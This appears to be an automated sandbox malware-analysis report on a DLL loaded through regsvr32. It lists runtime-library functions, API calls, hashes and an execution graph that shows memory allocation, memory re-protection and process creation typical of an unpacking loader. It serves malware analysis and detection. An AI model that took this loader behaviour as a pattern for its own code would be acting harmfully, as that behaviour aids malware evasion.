                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: free
                                                                      • String ID:
                                                                      • API String ID: 1294909896-0
                                                                      • Opcode ID: 66c2a68ae6921ce3eae9ed6cb47659e8359417b2a45b1d2ea151f135524af05a
                                                                      • Instruction ID: 04f5b342856782462c99f96a1031ca389a78bdbbc984d4d97839f5f1b48f98e1
                                                                      • Opcode Fuzzy Hash: 66c2a68ae6921ce3eae9ed6cb47659e8359417b2a45b1d2ea151f135524af05a
                                                                      • Instruction Fuzzy Hash: 40B18E32B19B82C5EB20DB62E8405AE77E1FB86744F488531EA8E43B89DFBCD515D740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526A60B0 Relevance: 7.6, APIs: 5, Instructions: 88COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: free$Sleep_errno
                                                                      • String ID:
                                                                      • API String ID: 2081351063-0
                                                                      • Opcode ID: ec136e1b37b0cf75a1e1cbd0173697211363db55ec0de315659f58b3930cb5b5
                                                                      • Instruction ID: 6a405a5bc5d26e49f9bedefe05eb9a6ae1fb8b44994b7eb184291c56484121cb
                                                                      • Opcode Fuzzy Hash: ec136e1b37b0cf75a1e1cbd0173697211363db55ec0de315659f58b3930cb5b5
                                                                      • Instruction Fuzzy Hash: A0310861A08682C5EF59AB25CD5227966E1EF86FC4F4CC035DE0D07B9EDFACE850A340
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526A72D4 Relevance: 7.6, APIs: 5, Instructions: 72COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DecodePointer.KERNEL32(?,?,?,00007FFA526A73E5,?,?,?,?,00007FFA526A34D2,?,?,?,00007FFA526A21CB), ref: 00007FFA526A72FD
                                                                      • DecodePointer.KERNEL32(?,?,?,00007FFA526A73E5,?,?,?,?,00007FFA526A34D2,?,?,?,00007FFA526A21CB), ref: 00007FFA526A730C
                                                                      • EncodePointer.KERNEL32(?,?,?,00007FFA526A73E5,?,?,?,?,00007FFA526A34D2,?,?,?,00007FFA526A21CB), ref: 00007FFA526A7389
                                                                        • Part of subcall function 00007FFA526A318C: realloc.LIBCMT ref: 00007FFA526A31B7
                                                                        • Part of subcall function 00007FFA526A318C: Sleep.KERNEL32(?,?,00000000,00007FFA526A7379,?,?,?,00007FFA526A73E5,?,?,?,?,00007FFA526A34D2), ref: 00007FFA526A31D3
                                                                      • EncodePointer.KERNEL32(?,?,?,00007FFA526A73E5,?,?,?,?,00007FFA526A34D2,?,?,?,00007FFA526A21CB), ref: 00007FFA526A7398
                                                                      • EncodePointer.KERNEL32(?,?,?,00007FFA526A73E5,?,?,?,?,00007FFA526A34D2,?,?,?,00007FFA526A21CB), ref: 00007FFA526A73A4
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: Pointer$Encode$Decode$Sleep_errnorealloc
                                                                      • String ID:
                                                                      • API String ID: 1310268301-0
                                                                      • Opcode ID: 45f99762a2f7ec127277c333d1f44571b1c8f3f0bb701b28e9aac5b400b42b2d
                                                                      • Instruction ID: e2cb18eef185c41f82f3f9b9c81ed09e4fbbe5ab0baee37e0943fd427377c1ba
                                                                      • Opcode Fuzzy Hash: 45f99762a2f7ec127277c333d1f44571b1c8f3f0bb701b28e9aac5b400b42b2d
                                                                      • Instruction Fuzzy Hash: 61214F11B4A682D1EA55AB61ED8407EA2D2FB86BC0B488435DD0E0BF5EDFBCE4859301
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526A71A4 Relevance: 7.6, APIs: 5, Instructions: 65COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: Pointer$Encode$Decode$Sleep_errnorealloc
                                                                      • String ID:
                                                                      • API String ID: 1310268301-0
                                                                      • Opcode ID: eece0b224e2bcc70f9921190d9f8722cba86776407b6ce9ac89865c4675fc459
                                                                      • Instruction ID: 18c5c4b05e9c7b0b971b948349a17ee5459222e6321903eb0bf28cfcaa419202
                                                                      • Opcode Fuzzy Hash: eece0b224e2bcc70f9921190d9f8722cba86776407b6ce9ac89865c4675fc459
                                                                      • Instruction Fuzzy Hash: 7A218021B49682D4EE45EB11AD84179A2D2EB46BC0F4C8535ED4E07F5EDFBCE495D300
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526A3310 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17libraryloaderCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(?,?,000000FF,00007FFA526A3359,?,?,00000028,00007FFA526A6C7D,?,?,00000000,00007FFA526A30C0,?,?,00000000,00007FFA526A6B19), ref: 00007FFA526A331F
                                                                      • GetProcAddress.KERNEL32(?,?,000000FF,00007FFA526A3359,?,?,00000028,00007FFA526A6C7D,?,?,00000000,00007FFA526A30C0,?,?,00000000,00007FFA526A6B19), ref: 00007FFA526A3334
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: AddressHandleModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 1646373207-1276376045
                                                                      • Opcode ID: d72bc5d50b22d09011b632762878156ef0257bf259d16f3c3461911ef1dd3856
                                                                      • Instruction ID: ba1d0c363cf9ff246416a9f4da87591e755b5f83ee45e11bc15510350eb1bdd3
                                                                      • Opcode Fuzzy Hash: d72bc5d50b22d09011b632762878156ef0257bf259d16f3c3461911ef1dd3856
                                                                      • Instruction Fuzzy Hash: FAE01250F2D64281FE195B50AC8413413D0EF9AB11B4CD438D81F06BA8DFECA6A9C310
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526A575C Relevance: 6.4, APIs: 5, Instructions: 134COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00007FFA526A309C: Sleep.KERNEL32(?,?,00000000,00007FFA526A6B19,?,?,00000000,00007FFA526A6BC3,?,?,?,?,?,?,00000000,00007FFA526A2DC8), ref: 00007FFA526A30D2
                                                                      • free.LIBCMT ref: 00007FFA526A58A5
                                                                      • free.LIBCMT ref: 00007FFA526A58C1
                                                                        • Part of subcall function 00007FFA526A6550: RtlCaptureContext.KERNEL32 ref: 00007FFA526A658F
                                                                        • Part of subcall function 00007FFA526A6550: IsDebuggerPresent.KERNEL32 ref: 00007FFA526A662D
                                                                        • Part of subcall function 00007FFA526A6550: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFA526A6637
                                                                        • Part of subcall function 00007FFA526A6550: UnhandledExceptionFilter.KERNEL32 ref: 00007FFA526A6642
                                                                        • Part of subcall function 00007FFA526A6550: GetCurrentProcess.KERNEL32 ref: 00007FFA526A6658
                                                                        • Part of subcall function 00007FFA526A6550: TerminateProcess.KERNEL32 ref: 00007FFA526A6666
                                                                      • free.LIBCMT ref: 00007FFA526A58D6
                                                                        • Part of subcall function 00007FFA526A3024: HeapFree.KERNEL32(?,?,00000000,00007FFA526A2DDC,?,?,?,00007FFA526A2DFF,?,?,?,00007FFA526A254F,?,?,?,00007FFA526A262A), ref: 00007FFA526A303A
                                                                        • Part of subcall function 00007FFA526A3024: _errno.LIBCMT ref: 00007FFA526A3044
                                                                        • Part of subcall function 00007FFA526A3024: GetLastError.KERNEL32(?,?,00000000,00007FFA526A2DDC,?,?,?,00007FFA526A2DFF,?,?,?,00007FFA526A254F,?,?,?,00007FFA526A262A), ref: 00007FFA526A304C
                                                                      • free.LIBCMT ref: 00007FFA526A58F5
                                                                      • free.LIBCMT ref: 00007FFA526A5911
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: free$ExceptionFilterProcessUnhandled_errno$CaptureContextCurrentDebuggerErrorFreeHeapLastPresentSleepTerminate
                                                                      • String ID:
                                                                      • API String ID: 2294642566-0
                                                                      • Opcode ID: dc7ff44f8b32ef672d501b76c056c74ad4bf38a7a2c0d5bc14e1adea1997e9e3
                                                                      • Instruction ID: db44630e4e44c0476cb108e3fe63efdbb5cd4162e9967c5a55eb99197c5aabc1
                                                                      • Opcode Fuzzy Hash: dc7ff44f8b32ef672d501b76c056c74ad4bf38a7a2c0d5bc14e1adea1997e9e3
                                                                      • Instruction Fuzzy Hash: 61516C36A04A9182EB20DF2AEC1116A63E5FB85BA8F5C8035DE4D47B98DF7CD946D340
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526A5B84 Relevance: 6.2, APIs: 4, Instructions: 186COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: _getptd
                                                                      • String ID:
                                                                      • API String ID: 3186804695-0
                                                                      • Opcode ID: fa6ae430652ad88a2b7c0fc47314cf8fd6a4311639ac00b8795087540084e4bb
                                                                      • Instruction ID: 7c083b11208101437a8ba6efae211f2ebdac1b5e4f0c1caf2b5dfabfabf114ba
                                                                      • Opcode Fuzzy Hash: fa6ae430652ad88a2b7c0fc47314cf8fd6a4311639ac00b8795087540084e4bb
                                                                      • Instruction Fuzzy Hash: 4D819E72A09682D6DB24DF25E9846AAB3E0FB45784F548136DB8D47F98EF7CE450CB00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526A61F0 Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: _lock$DecodePointer_errno_getptd
                                                                      • String ID:
                                                                      • API String ID: 4201827665-0
                                                                      • Opcode ID: 80346bd32cbc0638794b0fd1901a532c5b35ee42fd123eebcbfe5a7804c514a3
                                                                      • Instruction ID: 36795cb0a5a36718e4783a34e3079a13bf758420d2d911f0ad926f2d7d9c7076
                                                                      • Opcode Fuzzy Hash: 80346bd32cbc0638794b0fd1901a532c5b35ee42fd123eebcbfe5a7804c514a3
                                                                      • Instruction Fuzzy Hash: BB514721A09682C6FB54EB25AC517BA22D1FF46784F18C039DA9E47F9ADFBCE4419700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526AF9E8 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: _errno$DecodePointercalloc
                                                                      • String ID:
                                                                      • API String ID: 1531210114-0
                                                                      • Opcode ID: 135c3f51b5ce2e738d355fd0c7e716948f0291e158272fe6257324d9ebc5dc22
                                                                      • Instruction ID: af9338266489549f771f14716c1f78fca6ae1d400bf8fa080579def765bbfc84
                                                                      • Opcode Fuzzy Hash: 135c3f51b5ce2e738d355fd0c7e716948f0291e158272fe6257324d9ebc5dc22
                                                                      • Instruction Fuzzy Hash: CB219D22A18A47C5FB149F65A8113BA62D0EF86780F0CC534EB4D07F9EDFBDE8109601
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526A539C Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _lock.LIBCMT ref: 00007FFA526A53B2
                                                                      • free.LIBCMT ref: 00007FFA526A53D7
                                                                        • Part of subcall function 00007FFA526A3024: HeapFree.KERNEL32(?,?,00000000,00007FFA526A2DDC,?,?,?,00007FFA526A2DFF,?,?,?,00007FFA526A254F,?,?,?,00007FFA526A262A), ref: 00007FFA526A303A
                                                                        • Part of subcall function 00007FFA526A3024: _errno.LIBCMT ref: 00007FFA526A3044
                                                                        • Part of subcall function 00007FFA526A3024: GetLastError.KERNEL32(?,?,00000000,00007FFA526A2DDC,?,?,?,00007FFA526A2DFF,?,?,?,00007FFA526A254F,?,?,?,00007FFA526A262A), ref: 00007FFA526A304C
                                                                      • _lock.LIBCMT ref: 00007FFA526A53F2
                                                                      • free.LIBCMT ref: 00007FFA526A5438
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: _lockfree$ErrorFreeHeapLast_errno
                                                                      • String ID:
                                                                      • API String ID: 3188102813-0
                                                                      • Opcode ID: 09c59b142491067d37077feec729aeb8b77d96716ac98985a4df9f6db3f8d771
                                                                      • Instruction ID: 786148b2195335fd14c9c6ca4427019a01e1db8591fa6a606bc9fd00105c2633
                                                                      • Opcode Fuzzy Hash: 09c59b142491067d37077feec729aeb8b77d96716ac98985a4df9f6db3f8d771
                                                                      • Instruction Fuzzy Hash: 63112A21E0A542C6FF589BA1DC2137822D0EF82704F0CD535D71E56ADAEFACA851A321
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526A2C94 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalDeleteSection$Freefree
                                                                      • String ID:
                                                                      • API String ID: 1250194111-0
                                                                      • Opcode ID: 0b4381b0394cf9d2fe44ee79bc2f59f9ea8a8cfc0730820b202f43bccc0e215f
                                                                      • Instruction ID: c62576aedb2e76d51a74fb5d3dd2e7cc42cbd458574480dd3a5230bc4c328ce3
                                                                      • Opcode Fuzzy Hash: 0b4381b0394cf9d2fe44ee79bc2f59f9ea8a8cfc0730820b202f43bccc0e215f
                                                                      • Instruction Fuzzy Hash: 22113D31E09A92C6EA189B15ED4513863E0FB46B54F5CC531DB6E02E9DCFBCE5919700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526A544C Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: _lock$Sleep_errno_getptd
                                                                      • String ID:
                                                                      • API String ID: 2111406555-0
                                                                      • Opcode ID: 673e868a23441bf53d2040884fedd38da7dd7cebd98ae69a44e812092c6a0ba8
                                                                      • Instruction ID: 1e2b9253792eaeef13d6e4f4f4955f892f79ee458d83dfea0882a27dd7d24199
                                                                      • Opcode Fuzzy Hash: 673e868a23441bf53d2040884fedd38da7dd7cebd98ae69a44e812092c6a0ba8
                                                                      • Instruction Fuzzy Hash: 75015221A09682C6FB44AB75DC517AD62D0EF46784F48C034D71D17BCBCF6CE8609351
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526ABB50 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: _errno$_getptd
                                                                      • String ID: #
                                                                      • API String ID: 3432092939-1885708031
                                                                      • Opcode ID: 9b19af0c0418e3e0b258a70cd69edc5393c065aacbb8da76a6c44f52b7c881eb
                                                                      • Instruction ID: 1c93d08eb0c5c4ade141e6bbc1fa0ff219030f856b34cfe0d9f465de36549284
                                                                      • Opcode Fuzzy Hash: 9b19af0c0418e3e0b258a70cd69edc5393c065aacbb8da76a6c44f52b7c881eb
                                                                      • Instruction Fuzzy Hash: 2C519222A0D685C9D7609F14E8402BEABE0F793B40F5C8131DA9D13B99CFBDD851DB01
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526A9BB0 Relevance: 5.1, APIs: 4, Instructions: 148COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: free
                                                                      • String ID:
                                                                      • API String ID: 1294909896-0
                                                                      • Opcode ID: b79b3224c3083f646637f6279f6889a3266e8c7020fbd897531d60d37c45b2be
                                                                      • Instruction ID: 4dba464fe53d3be1709e452e930643b7f2478781f180fadcfece2d54aed95375
                                                                      • Opcode Fuzzy Hash: b79b3224c3083f646637f6279f6889a3266e8c7020fbd897531d60d37c45b2be
                                                                      • Instruction Fuzzy Hash: DF519532A09A81C5DB64AF11A8811BD77D0FB46B84F688531DB9E07B89CFBCE552D700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180018AB4 Relevance: 5.1, Strings: 4, Instructions: 119COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ,$,$2S=$i`}G
                                                                      • API String ID: 0-4285990414
                                                                      • Opcode ID: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
                                                                      • Instruction ID: 665cb0e6160ce90faac3fa7baf9a16caae401c848b442bb7533a8cc1fd62885f
                                                                      • Opcode Fuzzy Hash: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
                                                                      • Instruction Fuzzy Hash: 4D41E57051CB848FD7B4DF18D486BDABBE0FB98750F40495EE48DC3251DBB0A8858B86
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Execution Graph

                                                                      Execution Coverage:12.9%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:32
                                                                      Total number of Limit Nodes:0
                                                                      execution_graph 3440 18000ac48 3443 18000ac8e 3440->3443 3442 18000b6ec 3443->3442 3444 180021c3c 3443->3444 3445 180021c97 3444->3445 3446 180001bdc CreateProcessW 3445->3446 3447 180021e38 3446->3447 3447->3442 3448 180003598 3451 180003640 3448->3451 3449 1800044c0 3450 180021c3c CreateProcessW 3450->3451 3451->3449 3451->3450 3422 180021c3c 3423 180021c97 3422->3423 3426 180001bdc 3423->3426 3425 180021e38 3427 180001c82 3426->3427 3428 180001d21 CreateProcessW 3427->3428 3428->3425 3429 230423b0000 3430 230423b0183 3429->3430 3431 230423b043e VirtualAlloc 3430->3431 3432 230423b0462 3431->3432 3433 230423b0531 GetNativeSystemInfo 3432->3433 3435 230423b0a7b 3432->3435 3434 230423b056d VirtualAlloc 3433->3434 3433->3435 3438 230423b058b 3434->3438 3436 230423b0a00 3436->3435 3437 230423b0a56 RtlAddFunctionTable 3436->3437 3437->3435 3438->3436 3439 230423b09d9 VirtualProtect 3438->3439 3439->3438 3452 1800097c0 3455 1800097fc 3452->3455 3453 180021c3c CreateProcessW 3454 180009924 3453->3454 3455->3453 3455->3454

                                                                      Executed Functions

                                                                      Function 00000230423B0000 Relevance: 76.3, APIs: 5, Strings: 38, Instructions: 1094memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
